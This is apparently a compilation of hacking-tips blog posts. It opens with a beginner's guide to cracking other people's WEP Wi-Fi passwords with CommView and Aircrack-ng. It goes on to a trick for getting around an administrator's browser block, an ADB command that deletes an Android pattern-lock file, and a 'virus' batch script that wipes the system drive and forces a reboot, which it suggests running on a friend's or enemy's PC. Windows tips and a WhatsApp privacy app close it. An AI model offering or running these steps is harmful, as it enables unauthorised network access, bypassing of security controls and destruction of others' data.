How to Crack Wi-Fi Passwords—For Beginners!

An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere!
If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key.
Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down.
Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.

Table of Contents
1.      How are Wireless networks secured?
2.      What you'll need
3.      Setting up CommView for Wi-Fi
4.      Selecting the target network and capturing packets
5.      Waiting...
6.      Now the interesting part... CRACKING!
Are you a visual learner?
How Are Wireless Networks Secured?
In a secured wireless connection, internet data is sent in the form of encrypted packets. These packets are encrypted with network security keys. If you somehow manage to get hold of the key for a particular wireless network you virtually have access to the wireless internet connection
Broadly speaking there are two main types of encryptions used:
WEP (Wired Equivalent Privacy):
This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
WPA (Wi-Fi Protected Access):
This is the more secure alternative. Efficient cracking of the passphrase of such a network requires the use of a wordlist with the common passwords. In other words you use the old fashioned method of trial and error to gain access. Variations include WPA-2 which is the most secure encryption alternative till date. Although this can also be cracked using a wordlist if the password is common, this is virtually uncrackable with a strong password. That is, unless the WPA PIN is still enabled (as is the default on many routers).
Hacking WEP passwords is relatively fast, so we'll focus on how to crack them for this guide. If the only networks around you use WPA passwords, you'll want to follow this guide on how to crack WPA WiFi passwords instead.
What You'll Need...
·         A compatible wireless adapter:
This is by far the biggest requirement.The wireless card of your computer has to be compatible with the software CommVIew. This ensures that the wireless card can go into monitor mode which is essential for capturing packets.Click here to check if your wireless card is compatible
·         CommView for Wi-Fi :
This software will be used to capture the packets from the desired network adapter.Click here and download the software from the website.
·         Aircrack-ng GUI:
After capturing the packets this software does the actual cracking.Click here-Click here and download the software from the website.
·         A little patience is vital!!
Step 1: Setting Up CommView for Wi-Fi
·         Download the zip file of CommView for Wi-Fi from the website. Extract the file and run setup.exe to install CommView for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
·         Run CommView for Wi-Fi.
·         Click the play icon on the top left of the application window.
Start scanning for wireless networks.
CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network
Step 2: Selecting the Target Network and Capturing Packets
A few things to keep in mind before choosing the target wireless network
·         This tutorial is only for WEP encrypted networks.
So make sure you select a network with WEP next to its name
·         Choose a network with the highest signal.
·         Each network will have its details in the right column.
·         Make sure the WEP network you are choosing has the least the least dB (decibel) value.
Once you have chosen your target network,select it and click Capture to start capturing packets from the desired channel.
Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
·         Right click the desired network and click on copy MAC Address.
·         Switch to the Rules tab on the top.
·         On the left hand side choose MAC Addresses
·         Enable MAC Address rules
·         For 'Action' select 'capture' and for 'Add record' select 'both'.
·         Now paste the mac address copied earlier in the box below.
We need to capture only data packets for cracking. Hence select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets).
Now you have to save the packets so that they can be cracked later. To do this-
·         Go to the logging tab on top and enable auto saving.
·         Set Maximum Directory Size to 2000
·         Set Average Log File Size to 20.
Step 3: Waiting...
Now the boring part- WAITING!
NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal.
After you think you have enough packets (at least 100,000 packets)
·         Go to the log tab and click on concatenate logs.
·         Select all the logs that have been saved.
·         Do not close CommView for Wi-Fi
·         Now navigate to the folder where the concatenated logs have been saved
·         Open the log file
·         Select File- Export -Wire shark tcpdump format and choose any suitable destination.
This will save the logs with a .cap extension to that location
Now the Interesting Part... CRACKING!
·         Download Aircrack-ng and extract the zip file.
·         Open the folder and navigate to 'bin'.
·         Run Aircrack-ng GUI
·         Choose WEP
·         Open your .cap file that you had saved earlier.
·         Click Launch.
·         In the command prompt type in the index number of your target wireless network.
·         Wait for a while .If everything goes fine the wireless key will be shown.
You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets
BEST OF LUCK

Use Or Surf Internet Without Any Browser


Ever find yourself sitting in front
of a computer where Internet
Explorer or Firefox was blocked
by IT Administrator, and restricted
you from installing any software?
If that PC is running Windows
XP, then there is chance for you to
still surf Internet.

Just follow these simple steps:

1. Open Calculator, Start> Program
Files> Accessories> Calculator.

2. In Calculator, go to Help> Help
Topics.

3. Right click on the left hand side
of the title bar and click on 'Jump
to URL'.

4. Type in the URL and make sure
include the 'http://' at the
beginning.



Bypass Android Pattern Lockscreen using CMD (No Root & No Third-party App)


WARNING:
Try at your own risk.


Note*:

1.Make sure that your computer is set up with ADB (Android SDK) incase you don't have the ADB or don't know how to set it up search in google nd youtube.

2. Make sure that your Android device setting for "USB Debugging" is ENABLED or active.

Home>Apps>Settings>Developers options>USB debugging> check the box to enable

3. Make sure that your computer is equipped with necessary drivers and use your native USB cable.


FOLLOW this steps:

1. Plug-in your device to your PC using your USB cable (works on Windows, Mac and Linux). Make sure that you have an active pattern screenlock.

2. On your PC click on START / SEARCH / RUN and type "cmd" to launch the Command Prompt

3. On the cmd window type in "adb shell" (no quotation marks) then hit enter.

4. After entering type "rm /data/system/gesture.key" (no quotation marks) then hit enter.

5. After the process you need to "REBOOT" your Android device (without unplugging it to your PC).

6. After your phone fires up unplug it to your PC then your good to go... CONGRATULATIONS you successfully bypassed your Pattern Lock Screen, your phone now will accept any pattern you will draw on the lock screen as VALID and CORRECT.

Now if you're thinking that your phone's lock screen is not working properly. You can create a new Pattern password as normal as you did before the process like nothings happend. This will not hurt your phone's functions if you follow the steps.

To create Pattern Password just go to:

Home>Apps>Settings>Security>Screen lock>Pattern (4.0.3 Ice Cream Sandwich)
Home>Apps>Settings>Lock screen>Pattern (4.1.2 Jelly Bean)

Simple Virus That Destroy Your pc


simple virus that destroys a PC
A funny PC trick to prank your friends
It is a simple virus which can't detect by any antivirus.

first, Type this in your notepad:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@Echo off
Del C:\ *.*
y
or better version
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And save that as .bat and RUN IT
It will delete the content of C:\
drive...........!
PLEASE NoTe: don't run that .bat
file on your system .............. it
will delete your C:/ drive.
Even i didn't try this.
you can try and run this on your
waste old PC's.......!
OR
in your friend's or enemy's PC's.
( be responsibility of your friends)

Gernal Tips and Tricks



Windows hidden "god mode" folder Windows offers a centralized Control Panel for all of the OS settings, which makes it easy for users to tweak everything from desktop background to setting up a VPN. To enter this mode, create a new folder with this exact name (copy and paste it): God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}. The folder icon will change to a Control Panel-style icon, and you will be able to jump in and change all kinds of settings. Note: Don't try this on Windows Vista 64-bit as it's known to cause a reboot loop.

Use Problem Steps Recorder This handy tool automatically records any mouse clicks and takes screenshots for you. If you need tech assistance with your computer, go to Run by typing Windows + R, and then type "psr." Use the tool and by the time you are finished, you can send this information, neatly compiled automatically, to the person helping you with the issue. It will make the process of finding the problem much easier for them, which means you will be able to get your system up and running faster.

Find/Delete large files wasting space A handy tool called WinDirStat (Windows Directory Statistics) can be used to easily find which files and folders are taking up the most space on your drive. From there, you can delete them and open up a ton of storage space.

Reduce the number of programs running at startup If your PC is taking too long to boot, it’s probably because you have far too many programs running at startup. Reducing this is easy, it will make your PC launch noticeably faster and lighter upon first load. To change the items running at startup, go to Run using the hotkey Windows key + R, and type "msconfig." A small window will appear (see the screenshot below), select the Startup tab. From here you will be able to turn off many startup programs, which can shave several seconds (or minutes) off your boot time. (Note Windows 8 has moved this functionality to the Task Manager). Try to make sure you research what you are turning off as some processes might be needed by third party programs or drivers you have installed.

Cloud backup important files If you’re working on a critical paper for school, work, or any other major project, make sure you are backing up the file not just locally. You can use services like Dropbox, Google Drive, or any of the other popular cloud storage solution which will do the legwork for you on the background. Of course, you can also throw the files on a thumb drive or external HDD just to be safe but backing up to the cloud can be done seamlessly which is twice the advantage.

File Management Tips



Rename a file quickly Right-clicking and selecting rename is not very efficient. Instead, simply press F2 while a file is selected to change its name. To alter the name of another file, type TAB without deselecting the current file.
Rename files sequentially in Windows You actually don’t need to download any programs to perform a batch file rename in Windows. Instead, you can select all the files you want to change, right-click the first one in the list, select rename (or use F2), and type in the name. This will automatically change all the other files with the same root name with a suffix: (1), (2), and so on
Select multiple files using the keyboard To select a bunch of files using your keyboard, you can press Shift + down arrow to select a single file or Shift + Page Down to select a large group of files at one time.

HOW TO HIDE LAST SEEN FROM WHATSAPP


Hey friends, today I am going to share how to hide last seen from whatsappandroid. As you know last seen is a feature by whatsapp which enable your friends to know that you last online status on whatsapp also this feature of whatsapphelp your friends to know that you have read their sms or not. So if you want tohide last seen of your whatsapp then this post of mine will help to do this. Here are some steps in my post as usual , just read and follow them carefully..


Here are two methods to hide last seen from whatsapp:
  • Manual Method
  • Application Method
Manual Method
To disable this last feature of whatsapp , First of all we have to understand how this feature. Okay Let me tell. Whenever you open whatsapp it updates your last online time to its database using your internet connection. So if you will disable your internet connection before opening whatsapp then it can not update your last seen time to its database. So simple manual solution is that disable your internet connection before opening whatsapp.

Application Method
 There are many application available on Google Play Store to do that which you did manually. But I am going  share one of them because I tested it first and it is working fine. So here are steps , just read and follow them carefully.


STEP 1:
First of all INSTALL WhatsApp No Last Seen from playstore.


Cover art

STEP 2:
Now just configure this app using tutorial given in the app.

STEP 3:
Now you have to do nothing , now its app headache to hide your last seen from your friends. 
WORKING
Let me tell you working of this app. This app will recieve your whatsapp and will give you ability to reply the message. When you open whatsapp to reply, it will automatically disconnect from internet  and when you will come back to home screen it will automatically onnect you to the internet.

WhatsApp No Last Seen~shinobi - screenshot
Enjoy

Follow Us